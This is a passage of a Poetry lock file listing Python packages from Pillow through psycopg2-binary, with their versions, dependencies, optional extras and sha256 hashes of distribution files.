"sha256:806abdd8249ba3953c33742506fe414880bad78ac25cc9a9b1c6ae97bedd573f"}, {file = "Pillow-10.1.0-cp312-cp312-win_amd64.whl", hash = "sha256:eaed6977fa73408b7b8a24e8b14e59e1668cfc0f4c40193ea7ced8e210adf996"}, {file = "Pillow-10.1.0-cp38-cp38-macosx_10_10_x86_64.whl", hash = "sha256:fe1e26e1ffc38be097f0ba1d0d07fcade2bcfd1d023cda5b29935ae8052bd793"}, {file = "Pillow-10.1.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:7a7e3daa202beb61821c06d2517428e8e7c1aab08943e92ec9e5755c2fc9ba5e"}, {file = "Pillow-10.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:24fadc71218ad2b8ffe437b54876c9382b4a29e030a05a9879f615091f42ffc2"}, {file = "Pillow-10.1.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fa1d323703cfdac2036af05191b969b910d8f115cf53093125e4058f62012c9a"}, {file = "Pillow-10.1.0-cp38-cp38-manylinux_2_28_aarch64.whl", hash = "sha256:912e3812a1dbbc834da2b32299b124b5ddcb664ed354916fd1ed6f193f0e2d01"}, {file = "Pillow-10.1.0-cp38-cp38-manylinux_2_28_x86_64.whl", hash = "sha256:7dbaa3c7de82ef37e7708521be41db5565004258ca76945ad74a8e998c30af8d"}, {file = "Pillow-10.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:9d7bc666bd8c5a4225e7ac71f2f9d12466ec555e89092728ea0f5c0c2422ea80"}, {file = "Pillow-10.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:baada14941c83079bf84c037e2d8b7506ce201e92e3d2fa0d1303507a8538212"}, {file = "Pillow-10.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:2ef6721c97894a7aa77723740a09547197533146fba8355e86d6d9a4a1056b14"}, {file = "Pillow-10.1.0-cp39-cp39-macosx_10_10_x86_64.whl", hash = "sha256:0a026c188be3b443916179f5d04548092e253beb0c3e2ee0a4e2cdad72f66099"}, {file = "Pillow-10.1.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:04f6f6149f266a100374ca3cc368b67fb27c4af9f1cc8cb6306d849dcdf12616"}, {file = "Pillow-10.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bb40c011447712d2e19cc261c82655f75f32cb724788df315ed992a4d65696bb"}, {file = "Pillow-10.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1a8413794b4ad9719346cd9306118450b7b00d9a15846451549314a58ac42219"}, {file = "Pillow-10.1.0-cp39-cp39-manylinux_2_28_aarch64.whl", hash = "sha256:c9aeea7b63edb7884b031a35305629a7593272b54f429a9869a4f63a1bf04c34"}, {file = "Pillow-10.1.0-cp39-cp39-manylinux_2_28_x86_64.whl", hash = "sha256:b4005fee46ed9be0b8fb42be0c20e79411533d1fd58edabebc0dd24626882cfd"}, {file = "Pillow-10.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:4d0152565c6aa6ebbfb1e5d8624140a440f2b99bf7afaafbdbf6430426497f28"}, {file = "Pillow-10.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:d921bc90b1defa55c9917ca6b6b71430e4286fc9e44c55ead78ca1a9f9eba5f2"}, {file = "Pillow-10.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:cfe96560c6ce2f4c07d6647af2d0f3c54cc33289894ebd88cfbb3bcd5391e256"}, {file = "Pillow-10.1.0-pp310-pypy310_pp73-macosx_10_10_x86_64.whl", hash = "sha256:937bdc5a7f5343d1c97dc98149a0be7eb9704e937fe3dc7140e229ae4fc572a7"}, {file = "Pillow-10.1.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b1c25762197144e211efb5f4e8ad656f36c8d214d390585d1d21281f46d556ba"}, {file = "Pillow-10.1.0-pp310-pypy310_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:afc8eef765d948543a4775f00b7b8c079b3321d6b675dde0d02afa2ee23000b4"}, {file = "Pillow-10.1.0-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:883f216eac8712b83a63f41b76ddfb7b2afab1b74abbb413c5df6680f071a6b9"}, {file = "Pillow-10.1.0-pp39-pypy39_pp73-macosx_10_10_x86_64.whl", hash = "sha256:b920e4d028f6442bea9a75b7491c063f0b9a3972520731ed26c83e254302eb1e"}, {file = "Pillow-10.1.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1c41d960babf951e01a49c9746f92c5a7e0d939d1652d7ba30f6b3090f27e412"}, {file = "Pillow-10.1.0-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:1fafabe50a6977ac70dfe829b2d5735fd54e190ab55259ec8aea4aaea412fa0b"}, {file = "Pillow-10.1.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:3b834f4b16173e5b92ab6566f0473bfb09f939ba14b23b8da1f54fa63e4b623f"}, {file = "Pillow-10.1.0.tar.gz", hash = "sha256:e6bf8de6c36ed96c86ea3b6e1d5273c53f46ef518a062464cd7ef5dd2cf92e38"}, ] [package.extras] docs = ["furo", "olefile", "sphinx (>=2.4)", "sphinx-copybutton", "sphinx-inline-tabs", "sphinx-removed-in", "sphinxext-opengraph"] tests = ["check-manifest", "coverage", "defusedxml", "markdown2", "olefile", "packaging", "pyroma", "pytest", "pytest-cov", "pytest-timeout"] [[package]] name = "pinecone-client" version = "2.2.4" description = "Pinecone client and SDK" optional = true python-versions = ">=3.8" files = [ {file = "pinecone-client-2.2.4.tar.gz", hash = "sha256:2c1cc1d6648b2be66e944db2ffa59166a37b9164d1135ad525d9cd8b1e298168"}, {file = "pinecone_client-2.2.4-py3-none-any.whl", hash = "sha256:5bf496c01c2f82f4e5c2dc977cc5062ecd7168b8ed90743b09afcc8c7eb242ec"}, ] [package.dependencies] dnspython = ">=2.0.0" loguru = ">=0.5.0" numpy = ">=1.22.0" python-dateutil = ">=2.5.3" pyyaml = ">=5.4" requests = ">=2.19.0" tqdm = ">=4.64.1" typing-extensions = ">=3.7.4" urllib3 = ">=1.21.1" [package.extras] grpc = ["googleapis-common-protos (>=1.53.0)", "grpc-gateway-protoc-gen-openapiv2 (==0.1.0)", "grpcio (>=1.44.0)", "lz4 (>=3.1.3)", "protobuf (>=3.20.0,<3.21.0)"] [[package]] name = "pinecone-text" version = "0.4.2" description = "Text utilities library by Pinecone.io" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "pinecone_text-0.4.2-py3-none-any.whl", hash = "sha256:79468c197b2fc7738c1511a6b5b8e7697fad613604ad935661a438f621ad2004"}, {file = "pinecone_text-0.4.2.tar.gz", hash = "sha256:131d9d1cc5654bdff8c4e497bb00e54fcab07a3b501e38aa16a6f19c2f00d4c6"}, ] [package.dependencies] mmh3 = ">=3.1.0,<4.0.0" nltk = ">=3.6.5,<4.0.0" sentence-transformers = ">=2.0.0,<3.0.0" torch = ">=1.13.1,<2.0.0" transformers = ">=4.26.1,<5.0.0" wget = ">=3.2,<4.0" [[package]] name = "pkgutil-resolve-name" version = "1.3.10" description = "Resolve a name to an object." optional = false python-versions = ">=3.6" files = [ {file = "pkgutil_resolve_name-1.3.10-py3-none-any.whl", hash = "sha256:ca27cc078d25c5ad71a9de0a7a330146c4e014c2462d9af19c6b828280649c5e"}, {file = "pkgutil_resolve_name-1.3.10.tar.gz", hash = "sha256:357d6c9e6a755653cfd78893817c0853af365dd51ec97f3d358a819373bbd174"}, ] [[package]] name = "platformdirs" version = "3.11.0" description = "A small Python package for determining appropriate platform-specific dirs, e.g. a \"user data dir\"." optional = false python-versions = ">=3.7" files = [ {file = "platformdirs-3.11.0-py3-none-any.whl", hash = "sha256:e9d171d00af68be50e9202731309c4e658fd8bc76f55c11c7dd760d023bda68e"}, {file = "platformdirs-3.11.0.tar.gz", hash = "sha256:cf8ee52a3afdb965072dcc652433e0c7e3e40cf5ea1477cd4b3b1d2eb75495b3"}, ] [package.extras] docs = ["furo (>=2023.7.26)", "proselint (>=0.13)", "sphinx (>=7.1.1)", "sphinx-autodoc-typehints (>=1.24)"] test = ["appdirs (==1.4.4)", "covdefaults (>=2.3)", "pytest (>=7.4)", "pytest-cov (>=4.1)", "pytest-mock (>=3.11.1)"] [[package]] name = "playwright" version = "1.39.0" description = "A high-level API to automate web browsers" optional = false python-versions = ">=3.8" files = [ {file = "playwright-1.39.0-py3-none-macosx_10_13_x86_64.whl", hash = "sha256:384e195a6d09343f319031cf552e9cd601ede78fe9c082b9fa197537c5cbfe7a"}, {file = "playwright-1.39.0-py3-none-macosx_11_0_arm64.whl", hash = "sha256:d2c3634411828d9273196ed6f69f2fa7645c89732b3c982dcf09ab03ed4c5d2b"}, {file = "playwright-1.39.0-py3-none-macosx_11_0_universal2.whl", hash = "sha256:d2fd90f370599cf9a2c6a041bd79a5eeec62baf0e943c7c5c2079b29be476d2a"}, {file = "playwright-1.39.0-py3-none-manylinux1_x86_64.whl", hash = "sha256:699a8e707ca5f3567aa28223ee1be7e42d2bf25eda7d3d86babda71e36e5f16f"}, {file = "playwright-1.39.0-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:654bb3ae0dc3c69ffddc0c38c127c3b8e93032d8cf3928e2c4f21890cb39514b"}, {file = "playwright-1.39.0-py3-none-win32.whl", hash = "sha256:40ed7f2546c64f1bb3d22b2295b4d43ed5a2f0b7ea7599d93a72f723a1883e1e"}, {file = "playwright-1.39.0-py3-none-win_amd64.whl", hash = "sha256:a420d814e21b05e1156747e2a9fae6c3cca2b46bb4a0226fb26ee65538ce09c9"}, ] [package.dependencies] greenlet = "3.0.0" pyee = "11.0.1" typing-extensions = {version = "*", markers = "python_version <= \"3.8\""} [[package]] name = "pluggy" version = "1.3.0" description = "plugin and hook calling mechanisms for python" optional = false python-versions = ">=3.8" files = [ {file = "pluggy-1.3.0-py3-none-any.whl", hash = "sha256:d89c696a773f8bd377d18e5ecda92b7a3793cbe66c87060a6fb58c7b6e1061f7"}, {file = "pluggy-1.3.0.tar.gz", hash = "sha256:cf61ae8f126ac6f7c451172cf30e3e43d3ca77615509771b3a984a0730651e12"}, ] [package.extras] dev = ["pre-commit", "tox"] testing = ["pytest", "pytest-benchmark"] [[package]] name = "pooch" version = "1.8.0" description = "\"Pooch manages your Python library's sample data files: it automatically downloads and stores them in a local directory, with support for versioning and corruption checks.\"" optional = true python-versions = ">=3.7" files = [ {file = "pooch-1.8.0-py3-none-any.whl", hash = "sha256:1bfba436d9e2ad5199ccad3583cca8c241b8736b5bb23fe67c213d52650dbb66"}, {file = "pooch-1.8.0.tar.gz", hash = "sha256:f59981fd5b9b5d032dcde8f4a11eaa492c2ac6343fae3596a2fdae35fc54b0a0"}, ] [package.dependencies] packaging = ">=20.0" platformdirs = ">=2.5.0" requests = ">=2.19.0" [package.extras] progress = ["tqdm (>=4.41.0,<5.0.0)"] sftp = ["paramiko (>=2.7.0)"] xxhash = ["xxhash (>=1.4.3)"] [[package]] name = "portalocker" version = "2.8.2" description = "Wraps the portalocker recipe for easy usage" optional = true python-versions = ">=3.8" files = [ {file = "portalocker-2.8.2-py3-none-any.whl", hash = "sha256:cfb86acc09b9aa7c3b43594e19be1345b9d16af3feb08bf92f23d4dce513a28e"}, {file = "portalocker-2.8.2.tar.gz", hash = "sha256:2b035aa7828e46c58e9b31390ee1f169b98e1066ab10b9a6a861fe7e25ee4f33"}, ] [package.dependencies] pywin32 = {version = ">=226", markers = "platform_system == \"Windows\""} [package.extras] docs = ["sphinx (>=1.7.1)"] redis = ["redis"] tests = ["pytest (>=5.4.1)", "pytest-cov (>=2.8.1)", "pytest-mypy (>=0.8.0)", "pytest-timeout (>=2.1.0)", "redis", "sphinx (>=6.0.0)", "types-redis"] [[package]] name = "pox" version = "0.3.3" description = "utilities for filesystem exploration and automated builds" optional = true python-versions = ">=3.7" files = [ {file = "pox-0.3.3-py3-none-any.whl", hash = "sha256:e95febf7401918478a3c1441a3630656d9a2049803889b4f589821372889d0ce"}, {file = "pox-0.3.3.tar.gz", hash = "sha256:e1ced66f2a0c92a58cf3646bc7ccb8b4773d40884b76f85eeda0670474871667"}, ] [[package]] name = "ppft" version = "1.7.6.7" description = "distributed and parallel Python" optional = true python-versions = ">=3.7" files = [ {file = "ppft-1.7.6.7-py3-none-any.whl", hash = "sha256:fedb1b1253729d62483f2e1f36547fd50a5fc873ffbf9b78b48cfdc727d4180c"}, {file = "ppft-1.7.6.7.tar.gz", hash = "sha256:ab34436814e2f18238f35688fd869b2641b2d2d8dca22b8d246f6701dfc954c8"}, ] [package.extras] dill = ["dill (>=0.3.7)"] [[package]] name = "prometheus-client" version = "0.17.1" description = "Python client for the Prometheus monitoring system." optional = false python-versions = ">=3.6" files = [ {file = "prometheus_client-0.17.1-py3-none-any.whl", hash = "sha256:e537f37160f6807b8202a6fc4764cdd19bac5480ddd3e0d463c3002b34462101"}, {file = "prometheus_client-0.17.1.tar.gz", hash = "sha256:21e674f39831ae3f8acde238afd9a27a37d0d2fb5a28ea094f0ce25d2cbf2091"}, ] [package.extras] twisted = ["twisted"] [[package]] name = "prompt-toolkit" version = "3.0.39" description = "Library for building powerful interactive command lines in Python" optional = false python-versions = ">=3.7.0" files = [ {file = "prompt_toolkit-3.0.39-py3-none-any.whl", hash = "sha256:9dffbe1d8acf91e3de75f3b544e4842382fc06c6babe903ac9acb74dc6e08d88"}, {file = "prompt_toolkit-3.0.39.tar.gz", hash = "sha256:04505ade687dc26dc4284b1ad19a83be2f2afe83e7a828ace0c72f3a1df72aac"}, ] [package.dependencies] wcwidth = "*" [[package]] name = "proto-plus" version = "1.22.3" description = "Beautiful, Pythonic protocol buffers." optional = true python-versions = ">=3.6" files = [ {file = "proto-plus-1.22.3.tar.gz", hash = "sha256:fdcd09713cbd42480740d2fe29c990f7fbd885a67efc328aa8be6ee3e9f76a6b"}, {file = "proto_plus-1.22.3-py3-none-any.whl", hash = "sha256:a49cd903bc0b6ab41f76bf65510439d56ca76f868adf0274e738bfdd096894df"}, ] [package.dependencies] protobuf = ">=3.19.0,<5.0.0dev" [package.extras] testing = ["google-api-core[grpc] (>=1.31.5)"] [[package]] name = "protobuf" version = "3.19.6" description = "Protocol Buffers" optional = false python-versions = ">=3.5" files = [ {file = "protobuf-3.19.6-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:010be24d5a44be7b0613750ab40bc8b8cedc796db468eae6c779b395f50d1fa1"}, {file = "protobuf-3.19.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:11478547958c2dfea921920617eb457bc26867b0d1aa065ab05f35080c5d9eb6"}, {file = "protobuf-3.19.6-cp310-cp310-win32.whl", hash = "sha256:559670e006e3173308c9254d63facb2c03865818f22204037ab76f7a0ff70b5f"}, {file = "protobuf-3.19.6-cp310-cp310-win_amd64.whl", hash = "sha256:347b393d4dd06fb93a77620781e11c058b3b0a5289262f094379ada2920a3730"}, {file = "protobuf-3.19.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:a8ce5ae0de28b51dff886fb922012dad885e66176663950cb2344c0439ecb473"}, {file = "protobuf-3.19.6-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:90b0d02163c4e67279ddb6dc25e063db0130fc299aefabb5d481053509fae5c8"}, {file = "protobuf-3.19.6-cp36-cp36m-win32.whl", hash = "sha256:30f5370d50295b246eaa0296533403961f7e64b03ea12265d6dfce3a391d8992"}, {file = "protobuf-3.19.6-cp36-cp36m-win_amd64.whl", hash = "sha256:0c0714b025ec057b5a7600cb66ce7c693815f897cfda6d6efb58201c472e3437"}, {file = "protobuf-3.19.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:5057c64052a1f1dd7d4450e9aac25af6bf36cfbfb3a1cd89d16393a036c49157"}, {file = "protobuf-3.19.6-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:bb6776bd18f01ffe9920e78e03a8676530a5d6c5911934c6a1ac6eb78973ecb6"}, {file = "protobuf-3.19.6-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:84a04134866861b11556a82dd91ea6daf1f4925746b992f277b84013a7cc1229"}, {file = "protobuf-3.19.6-cp37-cp37m-win32.whl", hash = "sha256:4bc98de3cdccfb5cd769620d5785b92c662b6bfad03a202b83799b6ed3fa1fa7"}, {file = "protobuf-3.19.6-cp37-cp37m-win_amd64.whl", hash = "sha256:aa3b82ca1f24ab5326dcf4ea00fcbda703e986b22f3d27541654f749564d778b"}, {file = "protobuf-3.19.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2b2d2913bcda0e0ec9a784d194bc490f5dc3d9d71d322d070b11a0ade32ff6ba"}, {file = "protobuf-3.19.6-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:d0b635cefebd7a8a0f92020562dead912f81f401af7e71f16bf9506ff3bdbb38"}, {file = "protobuf-3.19.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7a552af4dc34793803f4e735aabe97ffc45962dfd3a237bdde242bff5a3de684"}, {file = "protobuf-3.19.6-cp38-cp38-win32.whl", hash = "sha256:0469bc66160180165e4e29de7f445e57a34ab68f49357392c5b2f54c656ab25e"}, {file = "protobuf-3.19.6-cp38-cp38-win_amd64.whl", hash = "sha256:91d5f1e139ff92c37e0ff07f391101df77e55ebb97f46bbc1535298d72019462"}, {file = "protobuf-3.19.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:c0ccd3f940fe7f3b35a261b1dd1b4fc850c8fde9f74207015431f174be5976b3"}, {file = "protobuf-3.19.6-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:30a15015d86b9c3b8d6bf78d5b8c7749f2512c29f168ca259c9d7727604d0e39"}, {file = "protobuf-3.19.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:878b4cd080a21ddda6ac6d1e163403ec6eea2e206cf225982ae04567d39be7b0"}, {file = "protobuf-3.19.6-cp39-cp39-win32.whl", hash = "sha256:5a0d7539a1b1fb7e76bf5faa0b44b30f812758e989e59c40f77a7dab320e79b9"}, {file = "protobuf-3.19.6-cp39-cp39-win_amd64.whl", hash = "sha256:bbf5cea5048272e1c60d235c7bd12ce1b14b8a16e76917f371c718bd3005f045"}, {file = "protobuf-3.19.6-py2.py3-none-any.whl", hash = "sha256:14082457dc02be946f60b15aad35e9f5c69e738f80ebbc0900a19bc83734a5a4"}, {file = "protobuf-3.19.6.tar.gz", hash = "sha256:5f5540d57a43042389e87661c6eaa50f47c19c6176e8cf1c4f287aeefeccb5c4"}, ] [[package]] name = "psutil" version = "5.9.6" description = "Cross-platform lib for process and system monitoring in Python." optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*" files = [ {file = "psutil-5.9.6-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:fb8a697f11b0f5994550555fcfe3e69799e5b060c8ecf9e2f75c69302cc35c0d"}, {file = "psutil-5.9.6-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:91ecd2d9c00db9817a4b4192107cf6954addb5d9d67a969a4f436dbc9200f88c"}, {file = "psutil-5.9.6-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:10e8c17b4f898d64b121149afb136c53ea8b68c7531155147867b7b1ac9e7e28"}, {file = "psutil-5.9.6-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:18cd22c5db486f33998f37e2bb054cc62fd06646995285e02a51b1e08da97017"}, {file = "psutil-5.9.6-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:ca2780f5e038379e520281e4c032dddd086906ddff9ef0d1b9dcf00710e5071c"}, {file = "psutil-5.9.6-cp27-none-win32.whl", hash = "sha256:70cb3beb98bc3fd5ac9ac617a327af7e7f826373ee64c80efd4eb2856e5051e9"}, {file = "psutil-5.9.6-cp27-none-win_amd64.whl", hash = "sha256:51dc3d54607c73148f63732c727856f5febec1c7c336f8f41fcbd6315cce76ac"}, {file = "psutil-5.9.6-cp36-abi3-macosx_10_9_x86_64.whl", hash = "sha256:c69596f9fc2f8acd574a12d5f8b7b1ba3765a641ea5d60fb4736bf3c08a8214a"}, {file = "psutil-5.9.6-cp36-abi3-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:92e0cc43c524834af53e9d3369245e6cc3b130e78e26100d1f63cdb0abeb3d3c"}, {file = "psutil-5.9.6-cp36-abi3-manylinux_2_12_x86_64.manylinux2010_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:748c9dd2583ed86347ed65d0035f45fa8c851e8d90354c122ab72319b5f366f4"}, {file = "psutil-5.9.6-cp36-cp36m-win32.whl", hash = "sha256:3ebf2158c16cc69db777e3c7decb3c0f43a7af94a60d72e87b2823aebac3d602"}, {file = "psutil-5.9.6-cp36-cp36m-win_amd64.whl", hash = "sha256:ff18b8d1a784b810df0b0fff3bcb50ab941c3b8e2c8de5726f9c71c601c611aa"}, {file = "psutil-5.9.6-cp37-abi3-win32.whl", hash = "sha256:a6f01f03bf1843280f4ad16f4bde26b817847b4c1a0db59bf6419807bc5ce05c"}, {file = "psutil-5.9.6-cp37-abi3-win_amd64.whl", hash = "sha256:6e5fb8dc711a514da83098bc5234264e551ad980cec5f85dabf4d38ed6f15e9a"}, {file = "psutil-5.9.6-cp38-abi3-macosx_11_0_arm64.whl", hash = "sha256:daecbcbd29b289aac14ece28eca6a3e60aa361754cf6da3dfb20d4d32b6c7f57"}, {file = "psutil-5.9.6.tar.gz", hash = "sha256:e4b92ddcd7dd4cdd3f900180ea1e104932c7bce234fb88976e2a3b296441225a"}, ] [package.extras] test = ["enum34", "ipaddress", "mock", "pywin32", "wmi"] [[package]] name = "psychicapi" version = "0.8.4" description = "Psychic.dev is an open-source data integration platform for LLMs. This is the Python client for Psychic" optional = true python-versions = "*" files = [ {file = "psychicapi-0.8.4-py3-none-any.whl", hash = "sha256:bf0a0ea858a79c8d443565d0d1ae8d7f8c63095bf4fd2bd7723241e46b59bbd4"}, {file = "psychicapi-0.8.4.tar.gz", hash = "sha256:18dc3f2e4ab4dbbf6002c39f4ce680fbd7b86253d92403a5e6530ddf07064224"}, ] [package.dependencies] requests = "*" [[package]] name = "psycopg2" version = "2.9.9" description = "psycopg2 - Python-PostgreSQL Database Adapter" optional = true python-versions = ">=3.7" files = [ {file = "psycopg2-2.9.9-cp310-cp310-win32.whl", hash = "sha256:38a8dcc6856f569068b47de286b472b7c473ac7977243593a288ebce0dc89516"}, {file = "psycopg2-2.9.9-cp310-cp310-win_amd64.whl", hash = "sha256:426f9f29bde126913a20a96ff8ce7d73fd8a216cfb323b1f04da402d452853c3"}, {file = "psycopg2-2.9.9-cp311-cp311-win32.whl", hash = "sha256:ade01303ccf7ae12c356a5e10911c9e1c51136003a9a1d92f7aa9d010fb98372"}, {file = "psycopg2-2.9.9-cp311-cp311-win_amd64.whl", hash = "sha256:121081ea2e76729acfb0673ff33755e8703d45e926e416cb59bae3a86c6a4981"}, {file = "psycopg2-2.9.9-cp37-cp37m-win32.whl", hash = "sha256:5e0d98cade4f0e0304d7d6f25bbfbc5bd186e07b38eac65379309c4ca3193efa"}, {file = "psycopg2-2.9.9-cp37-cp37m-win_amd64.whl", hash = "sha256:7e2dacf8b009a1c1e843b5213a87f7c544b2b042476ed7755be813eaf4e8347a"}, {file = "psycopg2-2.9.9-cp38-cp38-win32.whl", hash = "sha256:ff432630e510709564c01dafdbe996cb552e0b9f3f065eb89bdce5bd31fabf4c"}, {file = "psycopg2-2.9.9-cp38-cp38-win_amd64.whl", hash = "sha256:bac58c024c9922c23550af2a581998624d6e02350f4ae9c5f0bc642c633a2d5e"}, {file = "psycopg2-2.9.9-cp39-cp39-win32.whl", hash = "sha256:c92811b2d4c9b6ea0285942b2e7cac98a59e166d59c588fe5cfe1eda58e72d59"}, {file = "psycopg2-2.9.9-cp39-cp39-win_amd64.whl", hash = "sha256:de80739447af31525feddeb8effd640782cf5998e1a4e9192ebdf829717e3913"}, {file = "psycopg2-2.9.9.tar.gz", hash = "sha256:d1454bde93fb1e224166811694d600e746430c006fbb031ea06ecc2ea41bf156"}, ] [[package]] name = "psycopg2-binary" version = "2.9.9" description = "psycopg2 - Python-PostgreSQL Database Adapter" optional = true python-versions = ">=3.7" files = [ {file = "psycopg2-binary-2.9.9.tar.gz", hash = "sha256:7f01846810177d829c7692f1f5ada8096762d9172af1b1a28d4ab5b77c923c1c"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c2470da5418b76232f02a2fcd2229537bb2d5a7096674ce61859c3229f2eb202"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c6af2a6d4b7ee9615cbb162b0738f6e1fd1f5c3eda7e5da17861eacf4c717ea7"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:75723c3c0fbbf34350b46a3199eb50638ab22a0228f93fb472ef4d9becc2382b"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:83791a65b51ad6ee6cf0845634859d69a038ea9b03d7b26e703f94c7e93dbcf9"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:0ef4854e82c09e84cc63084a9e4ccd6d9b154f1dbdd283efb92ecd0b5e2b8c84"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ed1184ab8f113e8d660ce49a56390ca181f2981066acc27cf637d5c1e10ce46e"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:d2997c458c690ec2bc6b0b7ecbafd02b029b7b4283078d3b32a852a7ce3ddd98"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:b58b4710c7f4161b5e9dcbe73bb7c62d65670a87df7bcce9e1faaad43e715245"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:0c009475ee389757e6e34611d75f6e4f05f0cf5ebb76c6037508318e1a1e0d7e"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:8dbf6d1bc73f1d04ec1734bae3b4fb0ee3cb2a493d35ede9badbeb901fb40f6f"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-win32.whl", hash = "sha256:3f78fd71c4f43a13d342be74ebbc0666fe1f555b8837eb113cb7416856c79682"}, {file = "psycopg2_binary-2.9.9-cp310-cp310-win_amd64.whl", hash = "sha256:876801744b0dee379e4e3c38b76fc89f88834bb15bf92ee07d94acd06ec890a0"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ee825e70b1a209475622f7f7b776785bd68f34af6e7a46e2e42f27b659b5bc26"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1ea665f8ce695bcc37a90ee52de7a7980be5161375d42a0b6c6abedbf0d81f0f"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:143072318f793f53819048fdfe30c321890af0c3ec7cb1dfc9cc87aa88241de2"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c332c8d69fb64979ebf76613c66b985414927a40f8defa16cf1bc028b7b0a7b0"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f7fc5a5acafb7d6ccca13bfa8c90f8c51f13d8fb87d95656d3950f0158d3ce53"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:977646e05232579d2e7b9c59e21dbe5261f403a88417f6a6512e70d3f8a046be"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:b6356793b84728d9d50ead16ab43c187673831e9d4019013f1402c41b1db9b27"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:bc7bb56d04601d443f24094e9e31ae6deec9ccb23581f75343feebaf30423359"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:77853062a2c45be16fd6b8d6de2a99278ee1d985a7bd8b103e97e41c034006d2"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:78151aa3ec21dccd5cdef6c74c3e73386dcdfaf19bced944169697d7ac7482fc"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-win32.whl", hash = "sha256:dc4926288b2a3e9fd7b50dc6a1909a13bbdadfc67d93f3374d984e56f885579d"}, {file = "psycopg2_binary-2.9.9-cp311-cp311-win_amd64.whl", hash = "sha256:b76bedd166805480ab069612119ea636f5ab8f8771e640ae103e05a4aae3e417"}, {file = 